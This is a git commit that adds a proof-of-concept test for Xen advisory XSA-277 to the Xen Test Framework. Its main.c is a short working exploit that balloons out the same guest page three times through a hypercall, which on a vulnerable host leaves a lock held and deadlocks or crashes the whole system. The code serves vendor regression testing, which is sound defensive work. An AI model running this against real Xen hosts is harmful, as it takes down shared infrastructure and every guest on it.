From: Andrew Cooper <andrew.cooper3@citrix.com>
Date: Tue, 9 Oct 2018 17:59:29 +0000 (+0100)
Subject: XSA-277 PoC
X-Git-Url: http://xenbits.xensource.com/gitweb?a=commitdiff_plain;h=e8c157a751352c23f5d2c350e27098ec646d89e0;p=people%2Fandrewcoop%2Fxen-test-framework.git

XSA-277 PoC

Signed-off-by: Andrew Cooper <andrew.cooper3@citrix.com>
---

diff --git a/docs/all-tests.dox b/docs/all-tests.dox
index 732d44c..94527c2 100644
--- a/docs/all-tests.dox
+++ b/docs/all-tests.dox
@@ -126,6 +126,9 @@ guest.
 @subpage test-xsa-269 - x86: Incorrect MSR_DEBUGCTL handling lets guests
 enable BTS.
 
+@subpage test-xsa-277 - x86: incorrect error handling for guest p2m page
+removals.
+
 @subpage test-xsa-278 - x86: Nested VT-x usable even when disabled.
 
 
diff --git a/tests/xsa-277/Makefile b/tests/xsa-277/Makefile
new file mode 100644
index 0000000..6748004
--- /dev/null
+++ b/tests/xsa-277/Makefile
@@ -0,0 +1,9 @@
+include $(ROOT)/build/common.mk
+
+NAME      := xsa-277
+CATEGORY  := xsa
+TEST-ENVS := hvm64
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
diff --git a/tests/xsa-277/main.c b/tests/xsa-277/main.c
new file mode 100644
index 0000000..1bd06c9
--- /dev/null
+++ b/tests/xsa-277/main.c
@@ -0,0 +1,65 @@
+/**
+ * @file tests/xsa-277/main.c
+ * @ref test-xsa-277
+ *
+ * @page test-xsa-277 XSA-277
+ *
+ * Advisory: [XSA-277](http://xenbits.xen.org/xsa/advisory-277.html)
+ *
+ * Before XSA-277, an error path in the P2M code left a spinlock held when the
+ * guest tried to remove a page which was already not present.
+ *
+ * Attempt to balloon out the same frame three times, to try and force a
+ * deadlock.
+ *
+ * For debug builds of Xen, this should hit an assertion on the return to
+ * guest path.  For release builds, the test should never complete, and will
+ * either stall the entire system in the TSC rendezvous, or cause a crash from
+ * the watchdog (if activated).
+ *
+ * @see tests/xsa-277/main.c
+ */
+#include <xtf.h>
+
+const char test_title[] = "XSA-277 PoC";
+
+static uint8_t balloon[PAGE_SIZE] __page_aligned_bss;
+
+void test_main(void)
+{
+    unsigned long extents[] = {
+        virt_to_gfn(balloon),
+    };
+    struct xen_memory_reservation mr = {
+        .extent_start = extents,
+        .nr_extents = ARRAY_SIZE(extents),
+        .domid = DOMID_SELF,
+    };
+
+    /* Balloon out once.  Should succeed. */
+    if ( hypercall_memory_op(XENMEM_decrease_reservation, &mr) != 1 )
+        return xtf_error("Error trying to balloon out gfn %lx\n", extents[0]);
+
+    /*
+     * Balloon out twice.  Should fail, but when vulnerable to XSA-277, the
+     * hypercall will leave the p2m lock held.
+     */
+    if ( hypercall_memory_op(XENMEM_decrease_reservation, &mr) != 0 )
+        return xtf_failure("Fail: Probably vulnerable to XSA-277\n");
+
+    /* Balloon out thrice.  If vulnerable, will deadlock. */
+    if ( hypercall_memory_op(XENMEM_decrease_reservation, &mr) != 0 )
+        return xtf_failure("Fail: Probably vulnerable to XSA-277\n");
+
+    xtf_success("Success: Not vulnerable to XSA-277\n");
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */